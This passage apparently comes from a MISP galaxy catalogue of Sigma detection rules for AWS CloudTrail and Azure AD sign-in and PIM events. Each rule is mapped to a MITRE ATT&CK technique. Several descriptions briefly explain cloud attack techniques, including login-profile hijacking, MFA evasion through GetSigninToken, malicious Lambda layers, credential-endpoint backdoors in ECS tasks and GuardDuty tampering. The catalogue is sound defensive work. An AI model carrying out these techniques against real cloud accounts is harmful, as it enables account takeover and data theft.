https://github.com/Lifka/hacking-resources/blob/c2ae355d381bd0c9f0b32c4ead049f44e5b1573f/cloud-hacking-cheat-sheets.md

https://securitycafe.ro/2022/12/14/aws-enumeration-part-ii-practical-enumeration/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_enum_buckets.yml

AWS User Login Profile Was Modified

An attacker with the iam:UpdateLoginProfile permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup. With this alert, it is used to detect anyone is changing password on behalf of other users.

The tag is: misp-galaxy:sigma-rules="AWS User Login Profile Was Modified"

AWS User Login Profile Was Modified has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 11243. Table References

Links

https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_update_login_profile.yml

AWS EC2 VM Export Failure

An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance.

The tag is: misp-galaxy:sigma-rules="AWS EC2 VM Export Failure"

AWS EC2 VM Export Failure has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Transfer Data to Cloud Account - T1537" with estimative-language:likelihood-probability="almost-certain"

Table 11244. Table References

Links

https://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#export-instance

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_ec2_vm_export_failure.yml

AWS Identity Center Identity Provider Change

Detects a change in the AWS Identity Center (FKA AWS SSO) identity provider. A change in identity provider allows an attacker to establish persistent access or escalate privileges via user impersonation.

The tag is: misp-galaxy:sigma-rules="AWS Identity Center Identity Provider Change"

AWS Identity Center Identity Provider Change has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Authentication Process - T1556" with estimative-language:likelihood-probability="almost-certain"

Table 11245. Table References

Links

https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsiamidentitycentersuccessortoawssinglesign-on.html

https://docs.aws.amazon.com/singlesignon/latest/userguide/app-enablement.html

https://docs.aws.amazon.com/singlesignon/latest/userguide/sso-info-in-cloudtrail.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_sso_idp_change.yml

AWS STS GetSessionToken Misuse

Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.

The tag is: misp-galaxy:sigma-rules="AWS STS GetSessionToken Misuse"

AWS STS GetSessionToken Misuse has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Use Alternate Authentication Material - T1550" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Application Access Token - T1550.001" with estimative-language:likelihood-probability="almost-certain"

Table 11246. Table References

Links

https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html

https://github.com/elastic/detection-rules/pull/1213

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_sts_getsessiontoken_misuse.yml

AWS ECS Task Definition That Queries The Credential Endpoint

Detects when an Elastic Container Service (ECS) Task Definition includes a command to query the credential endpoint. This can indicate a potential adversary adding a backdoor to establish persistence or escalate privileges.

The tag is: misp-galaxy:sigma-rules="AWS ECS Task Definition That Queries The Credential Endpoint"

AWS ECS Task Definition That Queries The Credential Endpoint has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Implant Internal Image - T1525" with estimative-language:likelihood-probability="almost-certain"

Table 11247. Table References

Links

https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecsbackdoor_task_def/main.py

https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-iam-roles.html

https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_ecs_task_definition_cred_endpoint_query.yml

AWS IAM S3Browser LoginProfile Creation

Detects S3 Browser utility performing reconnaissance looking for existing IAM Users without a LoginProfile defined then (when found) creating a LoginProfile.

The tag is: misp-galaxy:sigma-rules="AWS IAM S3Browser LoginProfile Creation"

AWS IAM S3Browser LoginProfile Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud API - T1059.009" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11248. Table References

Links

https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_iam_s3browser_loginprofile_creation.yml

AWS GuardDuty Important Change

Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.

The tag is: misp-galaxy:sigma-rules="AWS GuardDuty Important Change"

AWS GuardDuty Important Change has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 11249. Table References

Links

https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/guarddutywhitelist_ip/main.py#L9

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_guardduty_disruption.yml

AWS Attached Malicious Lambda Layer

Detects when an user attached a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could utilize the function’s IAM role for AWS API calls. This would give an adversary access to the privileges associated with the Lambda service role that is attached to that function.

The tag is: misp-galaxy:sigma-rules="AWS Attached Malicious Lambda Layer"

Table 11250. Table References

Links

https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_attached_malicious_lambda_layer.yml

AWS Route 53 Domain Transfer Lock Disabled

Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar.

The tag is: misp-galaxy:sigma-rules="AWS Route 53 Domain Transfer Lock Disabled"

AWS Route 53 Domain Transfer Lock Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 11251. Table References

Links

https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html

https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml

https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_route_53_domain_transferred_lock_disabled.yml

AWS EFS Fileshare Modified or Deleted

Detects when a EFS Fileshare is modified or deleted. You can’t delete a file system that is in use. If the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare.

The tag is: misp-galaxy:sigma-rules="AWS EFS Fileshare Modified or Deleted"

Table 11252. Table References

Links

https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_efs_fileshare_modified_or_deleted.yml

AWS Console GetSigninToken Potential Abuse

Detects potentially suspicious events involving "GetSigninToken". An adversary using the "aws_consoler" tool can leverage this console API to create temporary federated credential that help obfuscate which AWS credential is compromised (the original access key) and enables the adversary to pivot from the AWS CLI to console sessions without the need for MFA using the new access key issued in this request.

The tag is: misp-galaxy:sigma-rules="AWS Console GetSigninToken Potential Abuse"

AWS Console GetSigninToken Potential Abuse has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Services - T1021.007" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Application Access Token - T1550.001" with estimative-language:likelihood-probability="almost-certain"

Table 11253. Table References

Links

https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/

https://github.com/NetSPI/aws_consoler

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_console_getsignintoken.yml

AWS Root Credentials

Detects AWS root account usage

The tag is: misp-galaxy:sigma-rules="AWS Root Credentials"

AWS Root Credentials has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11255. Table References

Links

https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_root_account_usage.yml

AWS IAM S3Browser User or AccessKey Creation

Detects S3 Browser utility creating IAM User or AccessKey.

The tag is: misp-galaxy:sigma-rules="AWS IAM S3Browser User or AccessKey Creation"

AWS IAM S3Browser User or AccessKey Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud API - T1059.009" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11256. Table References

Links

https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_iam_s3browser_user_or_accesskey_creation.yml

AWS Config Disabling Channel/Recorder

Detects AWS Config Service disabling

The tag is: misp-galaxy:sigma-rules="AWS Config Disabling Channel/Recorder"

AWS Config Disabling Channel/Recorder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 11257. Table References

Links

https://docs.aws.amazon.com/config/latest/developerguide/cloudtrail-log-files-for-aws-config.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_config_disable_recording.yml

AWS ElastiCache Security Group Created

Detects when an ElastiCache security group has been created.

The tag is: misp-galaxy:sigma-rules="AWS ElastiCache Security Group Created"

AWS ElastiCache Security Group Created has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Create Account - T1136" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Account - T1136.003" with estimative-language:likelihood-probability="almost-certain"

Table 11258. Table References

Links

https://github.com/elastic/detection-rules/blob/598f3d7e0a63221c0703ad9a0ea7e22e7bc5961e/rules/integrations/aws/persistence_elasticache_security_group_creation.toml

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_elasticache_security_group_created.yml

AWS S3 Bucket Versioning Disable

Detects when S3 bucket versioning is disabled. Threat actors use this technique during AWS ransomware incidents prior to deleting S3 objects.

The tag is: misp-galaxy:sigma-rules="AWS S3 Bucket Versioning Disable"

AWS S3 Bucket Versioning Disable has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 11259. Table References

Links

https://invictus-ir.medium.com/ransomware-in-the-cloud-7f14805bbe82

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_disable_bucket_versioning.yml

Too Many Global Admins

Identifies an event where there are there are too many accounts assigned the Global Administrator role.

The tag is: misp-galaxy:sigma-rules="Too Many Global Admins"

Too Many Global Admins has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11260. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#there-are-too-many-global-administrators

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_too_many_global_admins.yml

Roles Are Not Being Used

Identifies when a user has been assigned a privilege role and are not using that role.

The tag is: misp-galaxy:sigma-rules="Roles Are Not Being Used"

Roles Are Not Being Used has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11261. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#administrators-arent-using-their-privileged-roles

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_role_not_used.yml

Roles Activated Too Frequently

Identifies when the same privilege role has multiple activations by the same user.

The tag is: misp-galaxy:sigma-rules="Roles Activated Too Frequently"

Roles Activated Too Frequently has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11262. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-activated-too-frequently

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_role_frequent_activation.yml

Invalid PIM License

Identifies when an organization doesn’t have the proper license for PIM and is out of compliance.

The tag is: misp-galaxy:sigma-rules="Invalid PIM License"

Invalid PIM License has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11263. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#the-organization-doesnt-have-microsoft-entra-premium-p2-or-microsoft-entra-id-governance

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_invalid_license.yml

Roles Activation Doesn’t Require MFA

Identifies when a privilege role can be activated without performing mfa.

The tag is: misp-galaxy:sigma-rules="Roles Activation Doesn’t Require MFA"

Roles Activation Doesn’t Require MFA has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11264. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#roles-dont-require-multi-factor-authentication-for-activation

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_role_no_mfa_required.yml

Roles Assigned Outside PIM

Identifies when a privilege role assignment has taken place outside of PIM and may indicate an attack.

The tag is: misp-galaxy:sigma-rules="Roles Assigned Outside PIM"

Roles Assigned Outside PIM has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11265. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-assigned-outside-of-privileged-identity-management

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_role_assigned_outside_of_pim.yml

Stale Accounts In A Privileged Role

Identifies when an account hasn’t signed in during the past n number of days.

The tag is: misp-galaxy:sigma-rules="Stale Accounts In A Privileged Role"

Stale Accounts In A Privileged Role has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11266. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#potential-stale-accounts-in-a-privileged-role

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_account_stale.yml

Use of Legacy Authentication Protocols

Alert on when legacy authentication has been used on an account

The tag is: misp-galaxy:sigma-rules="Use of Legacy Authentication Protocols"

Use of Legacy Authentication Protocols has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

Table 11267. Table References

Links

https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_legacy_authentication_protocols.yml

Sign-in Failure Due to Conditional Access Requirements Not Met

Define a baseline threshold for failed sign-ins due to Conditional Access failures

The tag is: misp-galaxy:sigma-rules="Sign-in Failure Due to Conditional Access Requirements Not Met"

Sign-in Failure Due to Conditional Access Requirements Not Met has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11268. Table References

Links

https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_conditional_access_failure.yml

Applications That Are Using ROPC Authentication Flow

Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly. The application then uses those credentials to authenticate the user against the identity provider.

The tag is: misp-galaxy:sigma-rules="Applications That Are Using ROPC Authentication Flow"

Applications That Are Using ROPC Authentication Flow has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11269. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_app_ropc_authentication.yml

User Access Blocked by Azure Conditional Access

Detect access has been blocked by Conditional Access policies. The access policy does not allow token issuance which might be sights≈ of unauthorizeed login to valid accounts.

The tag is: misp-galaxy:sigma-rules="User Access Blocked by Azure Conditional Access"

User Access Blocked by Azure Conditional Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11270. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_user_login_blocked_by_conditional_access.yml

Increased Failed Authentications Of Any Type

Detects when sign-ins increased by 10% or greater.

The tag is: misp-galaxy:sigma-rules="Increased Failed Authentications Of Any Type"

Increased Failed Authentications Of Any Type has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11271. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_auth_failure_increase.yml

Users Authenticating To Other Azure AD Tenants

Detect when users in your Azure AD tenant are authenticating to other Azure AD Tenants.

The tag is: misp-galaxy:sigma-rules="Users Authenticating To Other Azure AD Tenants"

Users Authenticating To Other Azure AD Tenants has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11272. Table References

Links

https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_users_authenticating_to_other_azure_ad_tenants.yml

Authentications To Important Apps Using Single Factor Authentication

Detect when authentications to important application(s) only required single-factor authentication

The tag is: misp-galaxy:sigma-rules="Authentications To Important Apps Using Single Factor Authentication"

Authentications To Important Apps Using Single Factor Authentication has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11273. Table References

Links

https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_auth_to_important_apps_using_single_factor_auth.yml

Measurable Increase Of Successful Authentications

Detects when successful sign-ins increased by 10% or greater.

The tag is: misp-galaxy:sigma-rules="Measurable Increase Of Successful Authentications"

Measurable Increase Of Successful Authentications has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11274. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-successful-unusual-sign-ins

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_auth_sucess_increase.yml

Successful Authentications From Countries You Do Not Operate Out Of

Detect successful authentications from countries you do not operate out of.

The tag is: misp-galaxy:sigma-rules="Successful Authentications From Countries You Do Not Operate Out Of"

Successful Authentications From Countries You Do Not Operate Out Of has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

Table 11275. Table References

Links

https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml

Potential MFA Bypass Using Legacy Client Authentication

Detects successful authentication from potential clients using legacy authentication via user agent strings. This could be a sign of MFA bypass using a password spray attack.

The tag is: misp-galaxy:sigma-rules="Potential MFA Bypass Using Legacy Client Authentication"

Potential MFA Bypass Using Legacy Client Authentication has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

Table 11276. Table References

Links

https://www.microsoft.com/en-us/security/blog/2021/10/26/protect-your-business-from-password-sprays-with-microsoft-dart-recommendations/

https://blooteem.com/march-2022

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_suspicious_signin_bypassing_mfa.yml

Device Registration or Join Without MFA

Monitor and alert for device registration or join events where MFA was not performed.

The tag is: misp-galaxy:sigma-rules="Device Registration or Join Without MFA"

Device Registration or Join Without MFA has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11277. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_device_registration_or_join_without_mfa.yml

Discovery Using AzureHound

Detects AzureHound (A BloodHound data collector for Microsoft Azure) activity via the default User-Agent that is used during its operation after successful authentication.

The tag is: misp-galaxy:sigma-rules="Discovery Using AzureHound"

Discovery Using AzureHound has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Account - T1087.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Service Discovery - T1526" with estimative-language:likelihood-probability="almost-certain"

Table 11278. Table References

Links

https://github.com/BloodHoundAD/AzureHound

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_azurehound_discovery.yml

Account Lockout

Identifies user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password.

The tag is: misp-galaxy:sigma-rules="Account Lockout"

Account Lockout has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

Table 11279. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_account_lockout.yml

Sign-ins by Unknown Devices

Monitor and alert for Sign-ins by unknown devices from non-Trusted locations.

The tag is: misp-galaxy:sigma-rules="Sign-ins by Unknown Devices"

Sign-ins by Unknown Devices has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11280. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_sign_ins_from_unknown_devices.yml

Multifactor Authentication Interrupted

Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can’t pass the MFA challenge.

The tag is: misp-galaxy:sigma-rules="Multifactor Authentication Interrupted"

Multifactor Authentication Interrupted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Multi-Factor Authentication Request Generation - T1621" with estimative-language:likelihood-probability="almost-certain"

Table 11281. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_mfa_interrupted.yml

Multifactor Authentication Denied

User has indicated they haven’t instigated the MFA prompt and could indicate an attacker has the password for the account.

The tag is: misp-galaxy:sigma-rules="Multifactor Authentication Denied"

Multifactor Authentication Denied has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Multi-Factor Authentication Request Generation - T1621" with estimative-language:likelihood-probability="almost-certain"

Table 11282. Table References

Links

https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_mfa_denies.yml

Failed Authentications From Countries You Do Not Operate Out Of

Detect failed authentications from countries you do not operate out of.

The tag is: misp-galaxy:sigma-rules="Failed Authentications From Countries You Do Not Operate Out Of"

Failed Authentications From Countries You Do Not Operate Out Of has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

Table 11283. Table References

Links

https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml

Login to Disabled Account

Detect failed attempts to sign in to disabled accounts.

The tag is: misp-galaxy:sigma-rules="Login to Disabled Account"

Login to Disabled Account has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11284. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_login_to_disabled_account.yml

Suspicious SignIns From A Non Registered Device

Detects risky authencaition from a non AD registered device without MFA being required.

The tag is: misp-galaxy:sigma-rules="Suspicious SignIns From A Non Registered Device"

Suspicious SignIns From A Non Registered Device has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11285. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_risky_sign_ins_with_singlefactorauth_from_unknown_devices.yml

Azure AD Only Single Factor Authentication Required

Detect when users are authenticating without MFA being required.

The tag is: misp-galaxy:sigma-rules="Azure AD Only Single Factor Authentication Required"

Azure AD Only Single Factor Authentication Required has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Multi-Factor Authentication - T1556.006" with estimative-language:likelihood-probability="almost-certain"

Table 11286. Table References

Links

https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_only_single_factor_auth_required.yml

Sign-ins from Non-Compliant Devices

Monitor and alert for sign-ins where the device was non-compliant.

The tag is: misp-galaxy:sigma-rules="Sign-ins from Non-Compliant Devices"

Sign-ins from Non-Compliant Devices has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11287. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_sign_ins_from_noncompliant_devices.yml

Azure Unusual Authentication Interruption

Detects when there is a interruption in the authentication process.

The tag is: misp-galaxy:sigma-rules="Azure Unusual Authentication Interruption"

Azure Unusual Authentication Interruption has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 11288. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts

